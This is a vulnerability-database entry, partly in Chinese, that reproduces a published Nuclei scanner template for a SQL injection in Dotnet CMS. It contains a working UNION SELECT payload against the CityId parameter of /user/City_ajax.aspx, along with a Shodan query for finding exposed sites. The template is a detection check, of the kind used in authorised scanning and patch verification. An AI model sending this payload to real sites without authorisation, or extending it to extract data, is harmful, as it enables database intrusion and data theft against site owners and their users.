dotnetcms-sqli: Dotnet CMS - SQL Injection

日期: 2025-08-01 | 影响软件: Dotnet CMS | POC: 已公开

漏洞描述

Dotnet CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: dotnetcms-sqli

info:
  name: Dotnet CMS - SQL Injection
  author: ritikchaddha
  severity: critical
  description: Dotnet CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.cnblogs.com/rebeyond/p/4951418.html
    - http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"dotnetcms"
  tags: dotnetcms,dotnet,sqli,intrusive,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{randstr}}')),2--"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5("{{randstr}}")}}'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b17b735edf522079dafaebed59388fe562c9623ac4806483bbfd5aa1f4dd12f1022100d279bc64d78ac9a4f549cd80c7b7261a33c5cae753bbd1f0ed2b7f1c80e0671f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐